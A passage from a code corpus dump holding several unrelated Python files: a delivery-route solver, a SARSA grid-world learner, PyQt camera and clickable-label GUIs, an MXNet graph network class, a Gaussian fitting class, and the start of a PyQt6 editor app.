homes[1:]:\n # print(\"finding path between \" + str(current_home) + \" and \" + str(next_home))\n path_between = nx.astar_path(G, int(starting_car_location), int(current_home), distance_between_locations)\n total_path += path_between\n current_home = next_home\n total_path += nx.astar_path(G, int(current_home), int(starting_car_location), distance_between_locations)\n print(\"total super shitty path: \" + str(total_path))\n\n # locs = []\n # for i in list_of_locations:\n # locs.append(int(i))\n #\n # homes = []\n # for i in list_of_homes:\n # homes.append(int(i))\n\n # # first, find a node that is a neighbor of the start\n # dropOffIndex = None\n # for i in range(len(adjacency_matrix[0])):\n # if adjacency_matrix[0][i] == 1:\n # dropOffIndex = i\n #\n # dropOffNode = list_of_locations[dropOffIndex]\n\n graph_maker.print_trivial_output(len(list_of_locations), starting_car_location, list_of_homes)\n\n start = list_of_locations[int(starting_car_location)]\n # dropOffNode = list_of_locations[int(dropOffNode)]\n\n start = int(start)\n # dropOffNode = int(dropOffNode)\n return [start], {start: homes}\n\ndef compute_clustering_coefficient(G, trials=1000):\n n = len(G)\n triangles = 0\n nodes = G.nodes()\n for i in [np.random.randint(0, n) for i in range(trials)]:\n print([nodes[i]])\n nbrs = list(G[nodes[i]])\n if len(nbrs) < 2:\n continue\n u, v = np.random.choice(nbrs, 2)\n if u in G[v]:\n triangles += 1\n return triangles / float(trials)\n\n\n\"\"\"\n======================================================================\n No need to change any code below this line\n======================================================================\n\"\"\"\n\n\"\"\"\nConvert solution with path and dropoff_mapping in terms of indices\nand write solution output in terms of names to path_to_file + file_number + '.out'\n\"\"\"\ndef convertToFile(path, dropoff_mapping, path_to_file, list_locs):\n string = ''\n for node in path:\n string += list_locs[node] + ' '\n string = string.strip()\n string += '\\n'\n\n dropoffNumber = len(dropoff_mapping.keys())\n string += str(dropoffNumber) + '\\n'\n for dropoff in dropoff_mapping.keys():\n strDrop = list_locs[dropoff] + ' '\n for node in dropoff_mapping[dropoff]:\n strDrop += list_locs[node] + ' '\n strDrop = strDrop.strip()\n strDrop += '\\n'\n string += strDrop\n utils.write_to_file(path_to_file, string)\n\ndef solve_from_file(input_file, output_directory, params=[]):\n print('Processing', input_file)\n\n input_data = utils.read_file(input_file)\n num_of_locations, num_houses, list_locations, list_houses, starting_car_location, adjacency_matrix = data_parser(input_data)\n car_path, drop_offs = solve(list_locations, list_houses, starting_car_location, adjacency_matrix, params=params)\n\n basename, filename = os.path.split(input_file)\n if not os.path.exists(output_directory):\n os.makedirs(output_directory)\n output_file = utils.input_to_output(input_file, output_directory)\n\n convertToFile(car_path, drop_offs, output_file, list_locations)\n\ndef solve_from_file_score(input_file, output_directory, params=[]):\n print('Processing', input_file)\n\n input_data = utils.read_file(input_file)\n num_of_locations, num_houses, list_locations, list_houses, starting_car_location, adjacency_matrix = data_parser(input_data)\n car_path, drop_offs = solve(list_locations, list_houses, starting_car_location, adjacency_matrix, params=params)\n\n basename, filename = os.path.split(input_file)\n if not os.path.exists(output_directory):\n os.makedirs(output_directory)\n output_file = utils.input_to_output(input_file, output_directory)\n G = student_utils.adjacency_matrix_to_graph(adjacency_matrix)[0]\n #convertToFile(car_path, drop_offs, output_file, list_locations)\n return G, car_path, drop_offs\n\n\ndef solve_all(input_directory, output_directory, params=[]):\n input_files = utils.get_files_with_extension(input_directory, 'in')\n\n for input_file in input_files:\n solve_from_file(input_file, output_directory, params=params)\n\ndef solve_some(input_directory, output_directory, params=[]):\n input_files = utils.get_files_with_extension(input_directory, 'in')\n num_so_far = 0\n score = 0\n for input_file in input_files:\n num_so_far += 1\n G, car_cycle, dropoff_mapping = solve_from_file_score(input_file, output_directory)\n this_score = student_utils.cost_of_solution(G, car_cycle, dropoff_mapping)[0]\n graph_total = sum(G[u][v]['weight'] for (u,v) in G.edges)\n score += graph_total / this_score\n if num_so_far == 10:\n print(\"score:\")\n print(score)\n break\n\n\n\nif __name__==\"__main__\":\n parser = argparse.ArgumentParser(description='Parsing arguments')\n parser.add_argument('--all', action='store_true', help='If specified, the solver is run on all files in the input directory. Else, it is run on just the given input file')\n parser.add_argument('input', type=str, help='The path to the input file or directory')\n parser.add_argument('output_directory', type=str, nargs='?', default='.', help='The path to the directory where the output should be written')\n parser.add_argument('params', nargs=argparse.REMAINDER, help='Extra arguments passed in')\n args = parser.parse_args()\n output_directory = args.output_directory\n if args.all:\n input_directory = args.input\n solve_all(input_directory, output_directory, params=args.params)\n else:\n input_file = args.input\n solve_from_file(input_file, output_directory, params=args.params)\n","sub_path":"solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":13563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"620408073","text":"from __future__ import print_function, division\r\nfrom builtins import range\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom grid_world import standard_grid, negative_grid, ACTION_SPACE\r\nfrom grid_world_print import print_values, print_policy\r\n\r\ndef rand_action(a, eps=0.2):\r\n p = np.random.random()\r\n if p < (1 - eps):\r\n return a\r\n else:\r\n return np.random.choice(ACTION_SPACE)\r\n \r\n \r\n \r\ndef max_of(d):\r\n max_val = float('-inf')\r\n max_key = None\r\n for k, v in d.items():\r\n if v > max_val:\r\n max_val = v\r\n max_key = k\r\n return max_key, max_val\r\n\r\nif __name__ == '__main__':\r\n grid = negative_grid(step_cost=-0.1)\r\n\r\n print_values(grid.rewards, grid)\r\n print('\\n\\n')\r\n \r\n Q = {}\r\n for s in grid.all_states():\r\n Q[s] = {}\r\n for a in ACTION_SPACE:\r\n Q[s][a] = 0\r\n \r\n update_count = {}\r\n t = 1.0\r\n deltas = []\r\n \r\n for it in range(10000):\r\n if it%100 == 0:\r\n t = t + 1e-2\r\n if it%2000 == 0:\r\n print(it)\r\n \r\n s = (2,0)\r\n grid.set_state(s)\r\n \r\n a = max_of(Q[s])[0]\r\n a = rand_action(a, eps=0.5/t)\r\n biggest_change = 0\r\n while not grid.game_over():\r\n r = grid.move(a)\r\n s_next = grid.current_state()\r\n a_next = max_of(Q[s_next])[0]\r\n a_next = rand_action(a_next, eps=0.5/t) \r\n \r\n old_qsa = Q[s][a]\r\n Q[s][a] = Q[s][a] + 0.1*(r + 0.9*Q[s_next][a_next] - Q[s][a])\r\n biggest_change = max(biggest_change, np.abs(old_qsa - Q[s][a]))\r\n \r\n update_count[s] = update_count.get(s,0) + 1\r\n \r\n s = s_next\r\n a = a_next\r\n \r\n deltas.append(biggest_change)\r\n \r\n plt.plot(deltas)\r\n plt.show()\r\n \r\n V = {}\r\n policy = {}\r\n for s in grid.actions.keys():\r\n a, q = max_of(Q[s])\r\n policy[s] = a\r\n V[s] = q\r\n \r\n print(\"update counts:\")\r\n total = np.sum(list(update_count.values()))\r\n for k, v in update_count.items():\r\n update_count[k] = float(v) / total\r\n print_values(update_count, grid)\r\n \r\n \r\n \r\n print(\"values:\")\r\n print_values(V, grid)\r\n print(\"policy:\")\r\n print_policy(policy, grid)","sub_path":"sarsa.py","file_name":"sarsa.py","file_ext":"py","file_size_in_byte":2382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"206005541","text":"'''\n@author: zhufd\n@license: (C) Copyright 明州体检\n@contact: 245838515@qq.com\n@software: hms(健康管理系统)\n@file: bcamera.py\n@time: 2018-12-29 20:49\n@desc:摄像头/视频读取模块\n'''\n\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtCore import Qt,QTimer\nfrom PyQt5.QtGui import QImage,QPixmap\nfrom PyQt5.QtMultimedia import *\nfrom PyQt5.QtMultimediaWidgets import *\ntry:\n import cv2\nexcept Exception as e:\n cv2 = None\n print(\"载入模块cv2 失败,信息:%s\" %e)\n\nclass CameraWidget(QLabel):\n\n # 通过Opencv模块来实现\n # 优点:读标准摄像头、读非标摄像头、读写视频、处理图片等\n # 缺点:1、对XP支持不好 2、多个摄像头同时读取(不能插在同一个Hub上)\n\n def __init__(self,show_x,show_y):\n super(CameraWidget, self).__init__()\n self.resize(show_x,show_y)\n self.setScaledContents(1)\n self.initParas()\n\n # 初始化默认参数\n def initParas(self):\n self.show_width = 320\n self.show_height = 240\n self.show_fps = 24\n\n # 设置显示参数\n def setShowSize(self,width=320,height=240,fps=24):\n '''\n :param width: 宽度\n :param height: 高度\n :param fps: 每秒帧数\n :return: None\n '''\n self.show_width = width\n self.show_height = height\n self.show_fps = fps\n\n # 打开摄像头\n def open(self,camera_index=0):\n self.cap = cv2.VideoCapture(camera_index)\n print(\"摄像头宽:%s,高:%s \" %(self.cap.get(cv2.CAP_PROP_FRAME_WIDTH),self.cap.get(cv2.CAP_PROP_FRAME_HEIGHT)))\n # 想要修改参数前请记住你摄像头参数的初始值;\n # 参数被改动了,是无法自动恢复到初始值的;\n # 除非特别需要,否则不要随意修改这些参数。\n self.cap.set(cv2.CAP_PROP_FRAME_WIDTH, self.show_width) # 宽度\n self.cap.set(cv2.CAP_PROP_FRAME_HEIGHT, self.show_height) # 高度\n # self.cap.set(cv2.CAP_PROP_FPS, 30) # 帧数\n # self.cap.set(cv2.CAP_PROP_BRIGHTNESS, 1) # 亮度\n # self.cap.set(cv2.CAP_PROP_CONTRAST, 40) # 对比度\n # self.cap.set(cv2.CAP_PROP_SATURATION, 50) # 饱和度\n # self.cap.set(cv2.CAP_PROP_HUE, 50) # 色调\n # self.cap.set(cv2.CAP_PROP_EXPOSURE, 50) # 曝光\n self.start()\n\n # 开始图像传输,采用线程定时方式\n def start(self):\n self.timer = QTimer(self)\n self.timer.timeout.connect(self.onCapture)\n self.timer.start(1000 / self.show_fps)\n\n def onCapture(self):\n if not self.cap.isOpened():\n self.setText('打开失败,请检查配置!')\n self.setStyleSheet('''font: 75 14pt '黑体';color: rgb(204, 0, 0);''')\n return\n image = self.read()\n if image:\n self.setPixmap(QPixmap.fromImage(image, Qt.AutoColor))\n\n # 读取图像\n def read(self):\n # 按帧读取视频 其他方法\n # self.cap.retrieve()\n ret,frame = self.cap.read()\n # ret是布尔值 含义:如果读取帧是正确的则返回True,如果文件读取到结尾,它的返回值就为False。\n # frame就是每一帧的图像,是个三维矩阵\n try:\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n ##############处理旋转#####################################\n # rows,cols,count = frame.shape\n # M = cv2.getRotationMatrix2D((cols / 2, rows / 2), 270, 1)\n # frame = cv2.warpAffine(frame, M, (cols, rows))\n image = QImage(frame.data, frame.shape[1], frame.shape[0], frame.shape[1] * 3,QImage.Format_RGB888)\n # image = QImage(frame.data, frame.shape[1], frame.shape[0], frame.shape[1] * 3,\n # QImage.Format_RGB888).rgbSwapped()\n return image\n except Exception as e:\n self.timer.stop()\n\n # 暂停\n def stop(self):\n cv2.waitKey(0)\n\n # 拍照\n def onTakeImage(self,name):\n image = self.read()\n if image:\n image.save(name)\n return image\n\n # 关闭摄像头\n def deleteLater(self):\n self.timer.stop()\n self.cap.release()\n super(CameraWidget, self).deleteLater()\n\n\nclass CameraDefaultUI(QWidget):\n\n def __init__(self,parent=None):\n super(CameraDefaultUI,self).__init__(parent)\n self.initUI()\n self.initParas()\n self.cb_camera_selector.currentIndexChanged.connect(self.on_camera_select)\n self.btn_stop.clicked.connect(self.on_camera_stop)\n self.btn_start.clicked.connect(self.on_camera_start)\n self.btn_take.clicked.connect(self.on_camera_take)\n # 特殊变量\n\n def initUI(self):\n\n lt_main = QVBoxLayout()\n # 摄像头 展示\n lt_top = QHBoxLayout()\n gp_top = QGroupBox('摄像头')\n # 设置取景器\n self.viewfinder = QCameraViewfinder()\n self.viewfinder.show()\n lt_top.addWidget(self.viewfinder)\n lt_top.addStretch()\n gp_top.setLayout(lt_top)\n # 摄像头 社遏制\n lt_middle = QHBoxLayout()\n gp_middle = QGroupBox('设置')\n self.cb_camera_selector = QComboBox()\n self.cb_camera_degree = QComboBox()\n self.cb_camera_degree.addItems(['0','90','180','270'])\n lt_middle.addWidget(QLabel(\"切换摄像头:\"))\n lt_middle.addWidget(self.cb_camera_selector)\n lt_middle.addWidget(QLabel(\"旋转角度:\"))\n lt_middle.addWidget(self.cb_camera_degree)\n lt_middle.addStretch()\n gp_middle.setLayout(lt_middle)\n\n lt_bottom = QHBoxLayout()\n gp_bottom = QGroupBox('功能栏')\n self.btn_start = QPushButton(Icon('启动'), '启动')\n self.btn_stop = QPushButton(Icon('停止'), '停止')\n self.btn_take = QPushButton(Icon('拍照'), '拍照')\n lt_bottom.addWidget(self.btn_start)\n lt_bottom.addWidget(self.btn_stop)\n lt_bottom.addWidget(self.btn_take)\n lt_bottom.addStretch()\n gp_bottom.setLayout(lt_bottom)\n # 添加布局\n lt_main.addWidget(gp_top)\n lt_main.addWidget(gp_middle)\n lt_main.addWidget(gp_bottom)\n self.setLayout(lt_main)\n\n def initParas(self):\n self.cb_camera_selector.addItems([QCamera.deviceDescription(c) for c in QCamera.availableDevices()])\n self.camera_objs = QCameraInfo.availableCameras()\n\n # 打开默认的摄像头\n self.on_camera_select(0)\n self.set_image = QImageEncoderSettings()\n self.set_audio = QAudioEncoderSettings()\n self.set_video = QVideoEncoderSettings()\n\n # 选择摄像头\n def on_camera_select(self, i):\n self.cur_camera_name = self.cb_camera_selector.currentText()\n self.camera = QCamera(self.camera_objs[i])\n self.camera.setViewfinder(self.viewfinder)\n self.camera.setCaptureMode(QCamera.CaptureStillImage)\n self.camera.error.connect(lambda: self.alert(self.camera.errorString()))\n self.save_seq = 0\n self.on_camera_start()\n\n self.capture = QCameraImageCapture(self.camera)\n self.capture.error.connect(lambda i, e, s: self.alert(s))\n\n\n # 拍照\n def on_camera_take(self,filename=None):\n if filename:\n pass\n else:\n self.viewfinder.setContrast(100)\n timestamp = time.strftime(\"%d-%b-%Y-%H_%M_%S\")\n self.capture.capture(os.path.join(\"d:/\", \"%s-%04d-%s.jpg\" % (\n self.cur_camera_name,\n self.save_seq,\n timestamp\n )))\n self.save_seq += 1\n\n # 开始\n def on_camera_start(self):\n self.camera.start()\n self.btn_start.setDisabled(True)\n self.btn_stop.setDisabled(False)\n\n # 停止\n def on_camera_stop(self):\n self.camera.stop()\n self.btn_start.setDisabled(False)\n self.btn_stop.setDisabled(True)\n\n def alert(self, mes):\n \"\"\"\n Handle errors coming from QCamera dn QCameraImageCapture by displaying alerts.\n \"\"\"\n err = QErrorMessage(self)\n err.showMessage(mes)","sub_path":"widgets/bcamera.py","file_name":"bcamera.py","file_ext":"py","file_size_in_byte":8285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"499041763","text":"from __future__ import annotations\n\nfrom abc import abstractmethod\n\nimport mxnet as mx\nfrom typing import List, Dict\nfrom mxnet import nd\nfrom mxnet.gluon import Block, Parameter, ParameterDict\n\nfrom Graph import Subgraph, Graph\nfrom mxnet.ndarray import NDArray, Activation\n\nfrom common import model_ctx, data_ctx\nfrom samplers import Sampler\n\nfrom enum import Enum\n\nfrom samplers.LayerWiseSampler import LayerWiseSampler\n\nclass Mode(Enum):\n TRAINING = 1\n TEST = 2\n\n# TODO. Not ready at all\n\nclass LayerWiseSamplingGCN(Block):\n # noinspection PyPep8Naming\n def __init__(self,\n test_sampler: Sampler,\n graph: Graph,\n hidden_layer_sizes: List[int],\n concatenate_features: bool,\n nodes_per_layer: int):\n super().__init__()\n layer_sizes = [graph.num_features] + hidden_layer_sizes + [graph.num_classes]\n\n parameter_dict = ParameterDict()\n sizes_sum = [0] + list(layer_sizes)\n for i in range(1, len(sizes_sum)):\n sizes_sum[i] += sizes_sum[i - 1]\n sizes_sum[len(layer_sizes) - 1] = 0\n additional_sizes: List[i] = sizes_sum if concatenate_features else [0] * len(layer_sizes)\n\n # noinspection PyTypeChecker\n self._W: List[Parameter] = [parameter_dict.get(f\"W{i}\",\n shape=(layer_sizes[i + 1], layer_sizes[i] + additional_sizes[i]))\n for i in range(len(layer_sizes) - 1)]\n\n # noinspection PyTypeChecker\n self._b: List[Parameter] = [parameter_dict.get(f\"b{i}\", shape=(layer_sizes[i + 1], 1))\n for i in range(len(layer_sizes) - 1)]\n\n # noinspection PyTypeChecker\n self._g: Parameter = parameter_dict.get(f\"g\", shape=(layer_sizes[0], 1))\n\n parameter_dict.initialize(mx.init.Normal(sigma=0.1), ctx=model_ctx)\n\n # for w in self._W:\n # print(w.data().shape)\n\n self._feature_layers: List[List[NDArray]] = []\n for layer in range(len(layer_sizes)):\n features = [v.features\n if layer == 0 else\n nd.zeros(shape=(layer_sizes[layer] + additional_sizes[layer], 1), ctx=data_ctx)\n for v in graph.vertices]\n self._feature_layers.append(features)\n\n self._num_layers = len(self._feature_layers)\n self.parameter_dict = parameter_dict\n self.__training_sampler: Sampler = LayerWiseSampler(self, self._num_layers, nodes_per_layer)\n self.__test_sampler: Sampler = test_sampler\n self.mode = Mode.TRAINING\n self._graph = graph\n self._concatenate_features = concatenate_features\n\n def bound(self):\n for p in self._b + self._W:\n p.data()[:] = nd.clip(p.data(), -1e10, 1e10)\n\n def bound_layers(self):\n for layer in self._feature_layers:\n for arr in layer:\n arr[:] = nd.clip(arr, -1e10, 1e10)\n\n def forward(self, root_vertices: NDArray) -> NDArray:\n sampler = self.__training_sampler if self.mode == Mode.TRAINING else self.__test_sampler\n subgraphs = sampler.sample([self._graph.vertices[int(i.asscalar())] for i in root_vertices])\n vertices_on_layer: List[Dict[int, Subgraph]] = [{} for _ in range(self._num_layers)]\n self.__collect_vertices(subgraphs, len(self._feature_layers) - 1, vertices_on_layer)\n self.compute(vertices_on_layer)\n last_layer = [self._feature_layers[self._num_layers - 1][v.vertex] for v in subgraphs]\n return nd.stack(*last_layer).reshape(len(last_layer), -1)\n\n def __collect_vertices(self, subgraphs: List[Subgraph], layer: int, vertices_on_layer: List[Dict[int, Subgraph]]):\n \"\"\"\n Populates vertices_on_layer: for each layers stores which vertices must be computed.\n The main purpose is to avoid recomputation.\n\n :param subgraphs: subgraphs at the current layer\n :param layer: current layer\n :param vertices_on_layer: for each layers stores which vertices must be computed.\n :return: None\n \"\"\"\n for subgraph in subgraphs:\n vertices_on_layer[layer][subgraph.vertex] = subgraph\n if layer > 1:\n for subgraph in vertices_on_layer[layer].values():\n self.__collect_vertices(subgraph.neighbors, layer - 1, vertices_on_layer)\n\n @abstractmethod\n def compute(self, vertices_on_layer: List[Dict[int, Subgraph]]):\n \"\"\"\n Compute features which must be computed, according to vertices_on_layer.\n\n :param vertices_on_layer: For each layer stores a map: vertex.id -> subgraph.\n :return: None\n \"\"\"\n pass\n\n @abstractmethod\n def compute_vertex_layer(self, layer: int, vertex: int, subgraph: Subgraph) -> NDArray:\n pass\n\n @staticmethod\n def _act(x):\n return Activation(x, 'softrelu')\n","sub_path":"src/networks/LayerWiseSamplingGCN.py","file_name":"LayerWiseSamplingGCN.py","file_ext":"py","file_size_in_byte":4944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"303556697","text":"import scipy\nimport Image\nimport ImageDraw\nimport scipy.optimize as optimize\n\nclass Gaussian2DFitError(Exception):\n def __init__(self, msg):\n self.message = msg\n\nclass Gaussian2DFit:\n def __init__(self, image):\n \"\"\" \n Class constructor\n ===================\n image : a scipy.ndarray instance of 2d\n \"\"\" \n \n if not (isinstance(image, scipy.ndarray) and image.ndim == 2):\n raise Gaussian2DFitError(\"image is not scipy.ndarray of 2 dims\")\n\n self._orig_image = image\n self._shape = self._orig_image.shape\n self._p, self._cov = self._calc_fit_param()\n\n def get_fit_param(self):\n \"\"\"\n Get fit parameter\n ====================\n Return: p, cov\n Note: p = [ A, B, x0, y0, sx, sy, theta ]\n cov is the covariance matrix\n \"\"\"\n\n return self._p, self._cov\n\n def save_fit_image(self, fname):\n \"\"\" \n Save image with border\n ====================\n fname: name of the file to be saved\n \"\"\"\n\n A, B, x0, y0, sx, sy, theta = self._p\n sx, sy = scipy.fabs([sx, sy])\n\n # First draw an upright ellipse\n shape = (self._shape[1], self._shape[0])\n\n border = Image.new('L', shape, \"black\")\n draw = ImageDraw.Draw(border)\n bbox = ( y0-sy/2, x0-sx/2, y0+sy/2, x0+sx/2 )\n draw.ellipse(bbox, outline='white')\n\n # Then rotate the ellipse around (x0, y0) with angle theta\n c, s = scipy.cos(theta), -scipy.sin(theta)\n \n matrix = ( c, -s, y0 * (1-c) + x0 * s,\n s, c, x0 * (1-c) - y0 * s )\n\n border = border.transform(shape, Image.AFFINE, matrix)\n\n # Finally paste \n rescaled = (255.0 / self._orig_image.max() * self._orig_image).astype(scipy.uint8)\n new_img = Image.fromarray(rescaled)\n new_img.paste(border, new_img)\n new_img.save(fname)\n \n\n def _calc_fit_param(self):\n\n def gaussian(A, B, x0, y0, sx, sy, theta):\n \"\"\"\n Returns a gaussian function centered at (x0, y0) with \n stdev = (sx, sy), and rotated at angle theta\n \"\"\"\n c, s = scipy.cos(theta), scipy.sin(theta)\n\n def f(x, y):\n xx = (c * (x-x0) - s * (y-y0)) / sx\n yy = (s * (x-x0) + c * (y-y0)) / sy\n return A*scipy.exp( -(xx**2+yy**2)/2 ) + B\n return f\n \n def error(p):\n X, Y = scipy.indices(self._shape)\n g = gaussian(*p)\n\n return (g(X, Y) - self._orig_image).ravel()\n\n estimate = self._estimate_fit_param()\n p, cov, infodict, mesg, ier = optimize.leastsq(error, estimate, \n full_output=True)\n\n success = ier in [1,2,3,4]\n \n if not success:\n raise Gaussian2dFitError\n\n else:\n # Make sure sx and sy are positive\n p[4], p[5] = scipy.fabs([p[4], p[5]])\n \n dof = self._orig_image.size - len(p)\n s_sq = (infodict['fvec']**2).sum() / dof\n cov = cov * s_sq\n\n return p, cov\n\n def _estimate_fit_param(self):\n B = self._orig_image.min()\n w = self._orig_image - B\n A = w.max() \n\n X, Y = scipy.indices(self._shape)\n\n x0 = scipy.average(X, None, w)\n y0 = scipy.average(Y, None, w)\n\n col = w[:, int(y0)]\n var_x = scipy.average((scipy.arange(col.size) - y0)**2, None, col)\n\n row = w[int(x0), :]\n var_y = scipy.average((scipy.arange(row.size) - x0)**2, None, row)\n \n return A, B, x0, y0, var_x**0.5, var_y**0.5, 0\n","sub_path":"gaussian_2d_fit.py","file_name":"gaussian_2d_fit.py","file_ext":"py","file_size_in_byte":3714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"262840318","text":"# -*- coding: utf-8 -*-\n# ----------------------------------------------------------------------------\n# Nombre: QLabel_clickable.py\n# Autor: Miguel Andres Garcia Niño\n# Creado: 11 de Abril 2018\n# Modificado: 11 de Abril 2018\n# Copyright: (c) 2018 by Miguel Andres Garcia Niño, 2018\n# License: Apache License 2.0\n# ----------------------------------------------------------------------------\n\n__versión__ = \"1.0\"\n\n\"\"\"\nEl módulo *QLabel_clickable* permite llamar a una función al hacer clic o doble clic sobre\nun QLabel\n\"\"\"\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nfrom PyQt5.QtGui import QIcon, QPixmap\nfrom PyQt5.QtCore import Qt, pyqtSignal, QTimer\nfrom PyQt5.QtWidgets import QApplication, QDialog, QLabel, QMessageBox\n\n\n# ===================== CLASE QLabelClickable ======================\n\nclass QLabelClickable(QLabel):\n clicked = pyqtSignal(str)\n \n def __init__(self, parent=None):\n super(QLabelClickable, self).__init__(parent)\n\n def mousePressEvent(self, event):\n self.ultimo = \"Clic\"\n \n def mouseReleaseEvent(self, event):\n if self.ultimo == \"Clic\":\n QTimer.singleShot(QApplication.instance().doubleClickInterval(),\n self.performSingleClickAction)\n else:\n # Realizar acción de doble clic.\n self.clicked.emit(self.ultimo)\n \n def mouseDoubleClickEvent(self, event):\n self.ultimo = \"Doble Clic\"\n \n def performSingleClickAction(self):\n if self.ultimo == \"Clic\":\n self.clicked.emit(self.ultimo)\n\n\n# ===================== CLASE labelClickable =======================\n\nclass labelClickable(QDialog):\n def __init__(self, parent=None):\n super(labelClickable, self).__init__(parent)\n \n self.setWindowTitle(\"GeXentation\")\n self.setWindowIcon(QIcon(\"icon.png\"))\n self.setWindowFlags(Qt.WindowCloseButtonHint | Qt.MSWindowsFixedSizeDialogHint)\n self.setFixedSize(450,400)\n\n self.initUI()\n\n def initUI(self):\n\n # ==================== WIDGET QLABEL =======================\n \n \n\n self.button=QtWidgets.QPushButton('Start', self)\n self.button.setStyleSheet(\"QPushButton{ border: 1px \"\n \"#; border-radius: 4.5px;font-size:20px;}\")\n self.button.setGeometry(320,100 ,80, 30)\n\n\n self.button1=QtWidgets.QPushButton('Manual', self)\n self.button1.setStyleSheet(\"QPushButton{ border: 1px \"\n \"#; border-radius: 4.5px;font-size:20px;}\")\n self.button1.setGeometry(320,140 ,80, 30)\n\n self.button2=QtWidgets.QPushButton('Exit', self)\n self.button2.setStyleSheet(\"QPushButton{border: 1px \"\n \"#; border-radius: 4.5px;font-size:20px;}\")\n \n self.button2.setGeometry(320,180 ,80, 30)\n self.button2.clicked.connect(self.close)\n\n\n self.labelImagen = QLabelClickable(self)\n self.labelImagen.setGeometry(50, 40, 120, 130)\n self.labelImagen.setToolTip(\"1st Gesture\")\n self.labelImagen.setCursor(Qt.PointingHandCursor)\n\n self.labelImagen.setStyleSheet(\"QLabel {background-color: transparent; border: 1px \"\n \"; border-radius: 5px;transition-property: transform;}\")\n\n self.labelImagen.setStyleSheet(\"QLabel:hover {background-color: white;}\")\n self.pixmapImagen = QPixmap(\"1.png\").scaled(112, 128, Qt.KeepAspectRatio,\n Qt.SmoothTransformation)\n \n self.labelImagen.setPixmap(self.pixmapImagen)\n self.labelImagen.setAlignment(Qt.AlignCenter)\n \n\n\n\n self.label_2 = QLabelClickable(self)\n self.label_2.setGeometry(180, 40, 120, 130)\n self.label_2.setToolTip(\"2nd Gesture\")\n self.label_2.setCursor(Qt.PointingHandCursor)\n self.label_2.setStyleSheet(\"QLabel {background-color: transparent; border: 1px \"\n \"; border-radius: 5px;}\")\n self.label_2.setStyleSheet(\"QLabel:hover {background-color: white;}\")\n\n self.pixmapImagen2 = QPixmap(\"2.png\").scaled(112, 128, Qt.KeepAspectRatio,\n Qt.SmoothTransformation)\n self.label_2.setPixmap(self.pixmapImagen2)\n self.label_2.setAlignment(Qt.AlignCenter)\n\n self.label_3 = QLabelClickable(self)\n self.label_3.setGeometry(50, 180, 120, 130)\n self.label_3.setToolTip(\"3rd Gesture\")\n self.label_3.setCursor(Qt.PointingHandCursor)\n self.label_3.setStyleSheet(\"QLabel {background-color: transparent; border: 1px \"\n \"; border-radius: 5px;}\")\n\n self.label_3.setStyleSheet(\"QLabel:hover {background-color: white;}\")\n self.pixmapImagen3 = QPixmap(\"3.png\").scaled(112, 128, Qt.KeepAspectRatio,\n Qt.SmoothTransformation)\n self.label_3.setPixmap(self.pixmapImagen3)\n self.label_3.setAlignment(Qt.AlignCenter)\n\n self.label_4 = QLabelClickable(self)\n self.label_4.setGeometry(180, 180, 120, 130)\n self.label_4.setToolTip(\"3rd Gesture\")\n self.label_4.setCursor(Qt.PointingHandCursor)\n self.label_4.setStyleSheet(\"QLabel {background-color: transparent; border: 1px \"\n \"; border-radius: 5px;}\")\n self.label_4.setStyleSheet(\"QLabel:hover {background-color: white;}\")\n self.pixmapImagen4 = QPixmap(\"4.png\").scaled(112, 128, Qt.KeepAspectRatio,\n Qt.SmoothTransformation)\n self.label_4.setPixmap(self.pixmapImagen4)\n self.label_4.setAlignment(Qt.AlignCenter)\n\n\n\n\n\n\n\n\n\n # ===================== EVENTO QLABEL ======================\n\n # Llamar función al hacer clic o doble clic sobre el label\n self.labelImagen.clicked.connect(self.Clic)\n self.label_2.clicked.connect(self.secondClick)\n self.label_3.clicked.connect(self.thirdClick)\n self.label_4.clicked.connect(self.fourthClick)\n\n # ======================= FUNCIONES ============================\n\n def Clic(self):\n QMessageBox.information(self, \"1st Gesture\",\"1st Gesture was clicked\")\n def secondClick(self):\n QMessageBox.information(self, \"2nd Gesture\",\"2nd Gesture was clicked\")\n def thirdClick(self):\n QMessageBox.information(self, \"3rd Gesture\",\"3rd Gesture was clicked\")\n def fourthClick(self):\n QMessageBox.information(self, \"4th Gesture\",\"4th Gesture was clicked\") \n def close(self):\n QApplication.quit()\n\n# ================================================================\n\nif __name__ == '__main__':\n \n import sys\n \n aplicacion = QApplication(sys.argv)\n \n ventana = labelClickable()\n ventana.show()\n \n sys.exit(aplicacion.exec_())\n","sub_path":"src/gui/gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":6960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"562144238","text":"'''\n ====================================================================\n Copyright (c) 2003-2016 Barry A Scott. All rights reserved.\n\n This software is licensed as described in the file LICENSE.txt,\n which you should have received as part of this distribution.\n\n ====================================================================\n\n be_app.py\n\n Based on code from pysvn WorkBench\n\n'''\nimport sys\nimport os\nimport stat\nimport types\nimport logging\nimport tempfile\nimport threading\nimport inspect\nimport gettext\nimport queue\n\nfrom PyQt6 import QtWidgets\nfrom PyQt6 import QtGui\nfrom PyQt6 import QtCore\n\nimport be_main_window\nimport be_platform_specific\nimport be_preferences\nimport be_exceptions\nimport be_debug\n\nqt_event_type_names = {}\nfor name in dir(QtCore.QEvent.Type):\n value = getattr( QtCore.QEvent.Type, name )\n if isinstance( value, int ):\n qt_event_type_names[ int(value) ] = name\n\nclass BemacsApp(QtWidgets.QApplication, be_debug.EmacsDebugMixin):\n MarshallToGuiThreadSignal = QtCore.pyqtSignal( name='MarshallToGuiThread' )\n\n def __init__( self, args ):\n be_debug.EmacsDebugMixin.__init__( self )\n\n self.may_quit = False\n\n self.args = args\n self.opt_name = None\n self.release_waiting_client_reply = None\n\n self.startup_dir = os.getcwd()\n\n be_platform_specific.setupPlatform( args[0] )\n\n # on the Mac the app's cwd is the resource 